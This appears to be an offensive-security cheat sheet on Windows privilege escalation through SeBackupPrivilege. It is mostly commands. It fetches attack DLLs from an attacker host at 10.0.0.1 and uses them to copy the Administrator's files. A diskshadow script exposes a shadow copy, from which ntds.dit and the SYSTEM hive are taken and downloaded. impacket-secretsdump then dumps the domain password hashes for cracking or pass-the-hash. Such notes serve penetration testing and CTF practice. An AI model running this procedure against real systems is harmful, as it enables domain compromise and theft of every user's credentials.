# Windows PrivEsc by Abusing SeBackupPrivilege SeBackupPrivilege allows users to retrieve file contents. ### Investigation First check if the current user has SeBackupPrivilege in the privilege information. ``` whoami /all ``` If so, we can read arbitrary files on the system include administrator's files, SAML file, SYSTEM registry file, etc. ### Exploitation (Read Sensitive Files) #### 1. Download & Upload Malicious DLLs In local machine, download malicious dlls from [here](https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug) ``` # If powershell, Invoke-WebRequest -Uri http://10.0.0.1:8000/SeBackupPrivilegeUtils.dll -OutFile .\SeBackupPrivilegeUtils.dll Invoke-WebRequest -Uri http://10.0.0.1:8000/SeBackupPrivilegeCmdLets.dll -OutFile .\SeBackupPrivilegeCmdLets.dll # If winrm, upload SeBackupPrivilegeUtils.dll upload SeBackupPrivilegeCmdLets.dll Import-Module .\SeBackupPrivilegeUtils.dll Import-Module .\SeBackupPrivilegeCmdLets.dll Set-SeBackupPrivilege Get-SeBackupPrivilege ``` #### 2. Copy & Read Sensitive Files ``` Copy-FileSeBackupPrivilege C:\Users\Administrator\flag.txt C:\Users\Public\flag.txt -Overwrite ``` ### Exploitation (Retrieve Registry Keys) #### 1. Create a Payload and Transfer It Create **"diskshadow\.txt"** in local machine. It referes to [this](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#using-diskshadow-a-windows-signed-binary). ``` set metadata C:\tmp\tmp.cabs set context persistent nowriters add volume c: alias someAlias create expose %someAlias% h: ``` Upload this file to remote machine. ``` # If powershell, Invoke-WebRequest -Uri http://10.0.0.1:8000/diskshadow.txt -OutFile .\diskshadow.txt # If winrm, upload diskshadow.txt ``` #### 2. Execute DiskShadow\.Exe Then execute diskshadow\.exe. ``` # /s: Specify the script file diskshadow.exe /s .\diskshadow.txt ``` #### 3. Upload Malicious DLL We can download two dll files from [here](https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug). ``` # If powershell, Invoke-WebRequest -Uri http://10.0.0.1:8000/SeBackupPrivilegeUtils.dll -OutFile .\SeBackupPrivilegeUtils.dll Invoke-WebRequest -Uri http://10.0.0.1:8000/SeBackupPrivilegeCmdLets.dll -OutFile .\SeBackupPrivilegeCmdLets.dll # If winrm upload SeBackupPrivilegeUtils.dll upload SeBackupPrivilegeCmdLets.dll Import-Module .\SeBackupPrivilegeUtils.dll Import-Module .\SeBackupPrivilegeCmdLets.dll Copy-FileSeBackupPrivilege h:\windows\ntds\ntds.dit c:\tmp\ntds.dit -overwrite reg save HKLM\SYSTEM c:\tmp\system download ntds.dit download system ``` #### 4. Dump Password Hashes Now we have two files (ntds.dit and system) in local machine.\ We can dump password hashes using the files. ``` impacket-secretsdump -ntds ntds.dit -system system LOCAL ``` After that, crack the hashes or use them for pass-the-hash.